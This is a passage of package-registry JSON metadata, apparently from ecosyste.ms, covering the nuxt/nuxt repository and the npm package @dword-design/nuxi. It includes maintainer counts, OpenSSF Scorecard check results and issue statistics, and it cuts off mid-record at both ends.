ogin":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fconfig/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fconfig/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fconfig/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fconfig/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fconfig/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@rsnuxt%2Fconfig/codemeta","maintainers":[{"uuid":"vincent.bian","login":"vincent.bian","name":null,"email":"macisi528@gmail.com","url":null,"packages_count":74,"html_url":"https://www.npmjs.com/~vincent.bian","role":null,"created_at":"2025-02-11T09:15:31.143Z","updated_at":"2025-02-11T09:15:31.143Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vincent.bian/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":6453222,"name":"@dword-design/nuxi","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"dword-design","versions_count":5,"first_release_published_at":"2023-03-01T14:38:06.811Z","latest_release_published_at":"2023-03-03T19:24:44.368Z","latest_release_number":"0.2.3","last_synced_at":"2026-05-11T01:23:05.780Z","created_at":"2023-03-01T15:49:19.080Z","updated_at":"2026-05-11T01:23:05.780Z","registry_url":"https://www.npmjs.com/package/@dword-design/nuxi","install_command":"npm install @dword-design/nuxi","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.2.3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32596531,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-03T22:12:39.696Z","status":"online","status_checked_at":"2026-05-04T02:00:06.625Z","response_time":58,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-05-11T01:23:04.013Z","dependent_packages_count":0,"downloads":30,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":5.263915289809955,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.19404449168878496,"forks_count":0.7502833767040228,"average":12.880700800300593},"purl":"pkg:npm/%40dword-design/nuxi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@dword-design/nuxi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@dword-design/nuxi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@dword-design/nuxi/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-08T05:00:23.926Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":838,"past_year_pull_requests_count":1377,"past_year_avg_time_to_close_issue":720221.4700665189,"past_year_avg_time_to_close_pull_request":229718.65300285988,"past_year_issues_closed_count":451,"past_year_pull_requests_closed_count":1049,"past_year_pull_request_authors_count":127,"past_year_issue_authors_count":605,"past_year_avg_comments_per_issue":2.2386634844868736,"past_year_avg_comments_per_pull_request":3.3209876543209877,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":551,"past_year_merged_pull_requests_count":932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":59,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"cernymatej","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"BobbieGoede","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"antfu","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"inesh